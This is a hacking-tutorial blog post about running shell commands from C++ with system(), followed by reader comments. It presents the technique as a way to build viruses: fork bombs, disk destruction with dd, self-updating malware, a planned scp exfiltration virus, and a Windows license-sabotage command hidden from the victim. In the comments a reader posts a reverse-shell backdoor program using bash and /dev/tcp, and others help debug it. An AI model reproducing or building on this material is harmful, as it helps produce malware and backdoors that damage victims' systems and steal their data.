C/C++ for Hackers: Part 10 (System Commands)

Part 10 (System Commands)

C/C++ for Hackers: Part 10 (System Commands)

welcome back, fellow hackers! finally, i am releasing part 10 in my series on C++. this will surprisingly be a short article. in this part of my series, we will be looking how to execute system commands!

but first, a disclaimer:

I AM NOT RESPONSIBLE FOR ANY DAMAGE THAT YOU DO TO EITHER YOUR OWN COMPUTER OR SOMEONE ELSE'S! This post is for educational purposes only! do any of the following outside your lab AT YOUR OWN RISK!

so, let's get started!

Why Is Executing System Commands Useful?

on windows, it isn't as useful. but in Unix based systems where the terminal still rules, executing system commands in a virus is vital. we could for example make our virus update itself using the wget command in linux distros. or make a fork bomb and execute it, to make the target system crash after some time (viruses that do this are known as logic bombs.) or do permanent damage using the dd command. the possibilities are almost endless! one thing we can't do unfortunately is make the virus switch directories.

Step 1: Fire Up Ubuntu and Codeblocks

our first step is to fire up Ubuntu and our newly installed IDE called codeblocks. i am on a holiday when i wrote this and i only have my windows laptop., so i will use codeblocks for windows, but the code i am going to write should be the same for you. but for my tutorial, i will execute the "ipconfig" command on windows as a demonstration. you can use the "ifconfig" instead if you want, or any other command.

the function we are going to use is the "system()" function, located in the stdlib.h library. the system function take a string as a parameter. that string is the command we want to execute. so if we for example want to execute the "ifconfig" command, we would type our function as followed:

system("ifconfig");

Step 2: Copy/Paste the Code in Codeblocks and Compile

i already wrote an example, it is located here.

but before we can go and compile our code, we first need to make a project. a project is a way for CodeBlocks to order your code. to make a project, simply open codeblocks, and on the top left, go to file -> new -> project. a popup wizard will open like below:

we will select a console application so we can view the output of our command. so select it, then click "go". then you will be prompted with a welcoming screen. then click next. then you will be asked to choose either C or C++. we will select C++. then you will be asked to name your project and where to save it. you can name it whatever you want, but make sure to use a underscore instead of a space! (this is to avoid problems with the debugger). for example: Phoenix750-Tutorials.

as for where to save it, if you read part 9 of my series, you know we made a folder where we can save our projects, so you should save your new project there. if everything is set up, click next.

then you will see advanced options. leave these at their defaults and just click finished.

congratulations, you just made a new project! but how do you access the main.cpp file? on your left, you will see what is known as your "workspace". there you will also see the name of your project. click on the + symbol, and a folder will appear called "sources" then click on + before sources, and you will see your main.cpp file! to open it, just double click it. but it should be open by default though.

then you can just copy/paste my code and compile/run it in debugging mode. to do the latter, just navigate to the upper bar and click on the gear with the "play" symbol. (sorry for my poor paint skills :P)

and then, you will see the output of the ifconfig command or in my case, the windows ipconfig command!

Conclusion

executing system commands is crucial for computer viruses, especially in Unix based systems. remember that system() can execute any system command, even destructive ones (especially if you have root permission!), so be creative! but be aware of the disclaimer!

also, if you want to know some destructive commands check out This list.

in the next few tutorials, we will start making small viruses that utilize the system() function. so cya then!

-Phoenix750

51 Comments

What I think is that as this is more about hacking... you should assume that the user knows c++... so maybe u shud first post how to use c++ to develop malware or whatever.. and then post how to learn c++..

But ur tutorials are goooood but real slow... it will take months to reach the point where we start building malware ... so maybe u cud start on the tuts to make malware?? Im reaaly lookin forward to that ...

But anyway thank u and really goood work bro

I personally don't know C++ that well, just C. I find these tutorials very interesting, and Phoenix750's content is great. You need a base for a skyscraper; without it, it won't stand. ;)

this is the starting point to make malware. like i said, almost all malware uses the system() function. i was actually planning to make a file extractor for the next tutorial, which is malware on it's own already.

i just wanted to fly over the basics of C++, i wasn't planning to teach everything because like you said, that would take months. but like i said, i'm going to try to write a virus that uploads a specific folder to a server using the Unix scp command.

-Phoenix750

I'm so happy to see this.
When i write C++ program on windows system.
I always add this line at the end: system("pause");
That can't stop it gone so fast.
I learn c plus plus for six months.
But sometimes i can't focus on it.
I think i need more practice and try.
Thank you,Phoenix750 for teaching and sharing.
Hope you have a nice day.
------------------------------------DAGONCHU.

I don't know if you know how, but could you make a short series on using Devkit PPC for WiiBrew? It would be much appreciated. :)

i will have a look at it. but it might take some time.

-Phoenix750

Nice post :D
Looking forward to part 11 :D

i'm a little stuck because i bricked my Ubuntu installation, but i will be up and running in no time again!

-Phoenix750

Yep, I'm always right here waiting for you :D

In part 9, you wrote that will be create a virus to deactivate windows.
I think it will be this code:

system("slmgr -upk");

Is that right?

the code is system("C:\Windows\System32\slmgr.vbs /rearm");

the reason we defined the full path is because the exectutable probably won't be started in the system32 directory.

but there is more to that, because we also need to hide the command prompt window that starts automatically, so the victim won't suspect anything.

-Phoenix750

I think we can use this code:
system("C:\Windows\System32\slmgr.vbs /rearm");
I still do not know why "\" doesnt work in windows environment, i use "/", it run...
Or this code:
system("%windir%/system32/slmgr.vbs /rearm")
Because some people do not install windows on C:\ and we use "%windir%" to auto-detect.

And if we use back slash "\" i think we will use double back slash "\\" for directories. For example: ""C:\\Windows\\System32\\"

you are right. i can't believe i overlooked that...

-Phoenix750

Great tutorial phoenix!

btw, im getting a new laptop, and im setuping my lap, so i am thinking of using one of those:

  1. kali linux as main os (but is it secure enough?)
  2. Ubuntu as main os (and kali as vm in it)
  3. Ubuntu as main os (and intall the programs i need every hack one by one) (my own pentesting distro) (But i think this takes lots of effort and time)
  4. Kali as vm in windows

Which one do you think is the best ?
Thanks in advance.

If you want to use a pentesting distro as a main OS, go with Parrot. Kali isn't really that secure as a daily-use distro. If you don't necessarily want a pen-testing distro as main OS, you should defenitely go with Ubuntu.

-Phoenix750

I read that parrot isn't as stable as kali, and it has many bugs, and update issues, so I doubt it's good as main os!

But, it's way prettier! Can I know what do you personally use ?

Well, I can't speak for Phoenix750, but personally, I use WeakNet Linux 6. It's extremely secure if you know how to use it, and It's based on Debian Jessie, so updates are no problem at all. Lastly, and more importantly, it really looks amazing.

Ninja243

Oh yeah I noticed something if you plan on becoming a professional C++ programmer i suggest not using Namespaces its a good habit to pick up.

why? I do not know this :D

Bara Adnan:

Where did you hear Parrot has a lot of issues? Kali 2.0 has A LOT MORE issues than Parrot atm.

I personally use Parrot. I think it's a great everyday OS for a hacker. And that isn't just judging by it's looks. Tbh, I've never ran into a problem with ParrotSec as a main OS yet.

-Phoenix750

On cybrary!

can i know how you judged about parrot security ? How do you make sure about that it,s security is better than kali's one ?

also, i think offensive security is working on those bugs!
i currently use kali as vm, and i'mm not satisfied, it,s a bit laggy with 4 gb ram!
i prefer kali because i want to take the oscp and the others and they are based on kali os!

Don,t you think that parrot is in its early stage, and we should wait?

Also, did you try parrot on ssd?

And what about cyborg hawk ?

and do you do u use ubuntu as vm in parrot?

Also, why your c tuts arnt on parrot?

sorry for the many questions !

thanks in advance.

1.) even if OffSec is working on those bugs, they are doing a terrible job at it.
2.) Parrot and Kali are both based on Debian. At it's core, where it's security lays, they are somewhat the same.
3.) If you want to take the oscp, use a Kali VM specifically for that.
4.) Parrot has mostly outgrown it's development stage by now, but like with everything, there is still work on it.
5.) I have Parrot dual partitioned on my SSD with Windows 10
6.) Never tried Cyborg Hawk
7.) I use Ubuntu as a VM on my Win10. I might migrate it to Parrot though.
8.) I write my C/C++ series on Ubuntu because Ubuntu is better for coding/developing than either Parrot or Kali

-Phoenix750

Thank you Phoenix!
Very good information :)
I will tell you my decision when I make it.

So you are saying kali's security is the same as parrot security, then why did you say "Kali isn't really that secure as a daily-use distro" ? and advised me to go with parrot if they have the same security ?!

Also, is it gonna be a trouble following kali based null byte tuts on parrot ?!

Thank you !

That's because the way they are configured. Kali always uses the root user by default, Parrot has a seperate, non-root account that is used by default, unlike Kali, which uses a root account by default. Basically, anything you run on Kali is runned with root permissions by default. This isn't the case with Parrot.

This doesn't really make Kali bad, because Kali wasn't really ment to be used as a main distro, but rather as a live USB/CD.

-Phoenix750

But I can easily make a non root user in kali, and this problem would be solved !

Then the problem would be solved, yes. But i've had quite a lot of trouble with non-root users in Kali for some reason.

-Phoenix750

Hmmm, I think I'm gonna go with parrot!
I wish I like it. Also, I'm thinking of using it with oscp.

Bara:

First, not everything you read on the web is true.

Second, if you want to follow the tutorials here on Null Byte, use Kali as that is what we are using.

OTW, can you please give me your opinion about Phoenix's last reply ?

I have 100% confidence in Phoenix. Enough said.

Awesome, thank you!

But don't you think there will be no big difference between kali and parrot ?
Maybe just file places, but same commands i think!
at all, i will take your advice very seriously. thank you.

There are minor differences, but they are pretty significant when following the tutorials on here. Most tools/commands are the same, but the file locations differ mostly.

-Phoenix750

Thank you!
Do you personally find it hard to follow null byte tuts on parrot ?

Not really, but that is probably because I'm used to Parrot.

-Phoenix750

I too feel like the tutorials are going a bit too slow. Maybe you should take a little longer to make one well detailed post that includes more information instead of having short posts with little information. That way you can get the basics across for everyone and get started on the fun stuff everyone here wants to learn.

Also, are you planning on posting more tutorials?

I would love to contribute to this. I've been programming in C++ for about 4 years. I've never tried writing any malware but will soon be taking a course about writing malware at my University. However, it is in Python so I might cover Python while you cover C++...

I clearly stated a few times that this series is hibernated for now.

-Phoenix750

Can u plz continue this series....

system is a void, so you cant go std::string = system('whoami'). Is there any way to get stdout and stderr? I understand you are busy, any links would be appreciated.

Read the comments above.

-Phoenix750

Firstly, thanks for an amazing series. I've got a question about some code I'm trying to run. I've found a command for a reverse shell on this site (thanks to Cameron Glass's article on a reverse shell / backdoor for OSX). I'm trying to run this:

-- Begin Code --
#include <stdio.h>
#include <iostream>
#include <stdlib.h>

using namespace std;

int main(){

system("bash -i >& /dev/tcp/127.0.0.1/9001 0>&1");

return 0;

}

-- End Code --

But I get this error when I try to run it:

-- Begin Error --

sh: 1: Syntax error: Bad fd number

-- End Error --

Any ideas?

Ninja243

Edit: I'd like to mention that the code compiles and that I was running this program which was called "backdoor.out"

Did you test it on an OSX or Linux system?

-Phoenix750

This is an issue with your shell command, not the program itself.

Exactly what I was thinking.

-Phoenix750

Yeah, I was running it on WeakNet Linux 6 (revision 12), which is based on Debian 7. The shell command works outside of the script, which is why I'm confused.

Thanks for the help so far

Ninja243

You have to use bash in order to use /dev/tcp/.../. Either change the link on /bin/sh or look for specific instructions for your distribution.

It looks like, if you run bash inside a dash session you do not have access to /dev/tcp/.... As system(cmd) is actually runing /bin/sh -c cmd, your C code does not work.

Hope this helps

It does, thanks for the help

Ninja243

Share Your Thoughts

  • Hot
  • Latest